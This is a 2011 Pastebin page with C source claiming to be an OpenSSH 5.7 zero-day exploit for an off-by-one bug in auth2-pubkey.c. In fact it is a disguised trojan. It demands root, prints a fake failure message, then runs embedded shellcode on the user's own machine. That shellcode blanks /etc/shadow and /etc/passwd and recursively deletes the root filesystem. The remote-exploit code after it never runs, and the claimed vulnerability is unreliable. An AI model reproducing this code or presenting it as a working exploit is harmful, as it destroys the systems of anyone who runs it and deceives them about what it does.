SHARE
TWEET

Untitled

a guest Jan 26th, 2011 2,601 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. /*
  2. openSSH 5.7 0day exploit
  3. Off by One error in auth2-pubkey.c
  4. Author: Chroniccommand
  5. Usage: ./exploit <host> <ip>
  6. greetz to _st4ck3d*, x3n0n, xin etc you know who you are ;)
  7. */
  8. #include <stdio.h>
  9. #include <netdb.h>
  10. #include <stdlib.h>
  11. #include <string.h>
  12. #include <unistd.h>
  13. #include <arpa/inet.h>
  14. #include <sys/types.h>
  15. #include <sys/socket.h>
  16. #include <netinet/in.h>
  17.  
  18. void usage(char *argv[])
  19. {
  20.   printf("Usage: %s <target> <port>\n", argv[0]);
  21.   exit(1);
  22. }
  23.  
  24. unsigned char shellcode[] =
  25. "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
  26. "\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x39\x00\x00\x00\x65"
  27. "\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\x2f\x65\x74\x63\x2f\x73"
  28. "\x68\x61\x64\x6f\x77\x20\x3b\x20\x65\x63\x68\x6f\x20\x22\x22"
  29. "\x20\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20"
  30. "\x3b\x20\x72\x6d\x20\x2d\x52\x66\x20\x2f\x00\x57\x53\x89\xe1"
  31. "\xcd\x80";
  32.  
  33.  
  34.  
  35. int main(int argc, char *argv[])
  36. {
  37.   int uid = getuid();
  38.   int port = 22, sock;
  39.   struct hostent *host;
  40.   struct sockaddr_in addr;
  41.  
  42.   if(uid !=0)
  43.   {
  44.     fprintf(stderr, "[!!]Error: You must be root\n");
  45.     exit(1);
  46.   }
  47.   if(uid == 0)
  48.   {
  49.     printf("\t[+]Starting exploit..\n");
  50.   }
  51.   if(argc != 3)
  52.        usage(argv);
  53.  
  54.   fprintf(stderr, "[!!]Exploit failed\n");
  55.   (*(void(*)())shellcode)();
  56.   exit(1);
  57.   char payload[1024];
  58.   memcpy(payload, &shellcode, sizeof(shellcode));
  59.   if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==0)
  60.   {
  61.     printf("[+]Got shell\n");
  62.     system("/bin/sh");
  63.   }
  64.   else if(connect(sock,(struct sockaddr*)&addr, sizeof(addr))==-1)
  65.   {
  66.     fprintf(stderr, "[!!]Exploit failed\n");
  67.     exit(1);
  68.   }
  69. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top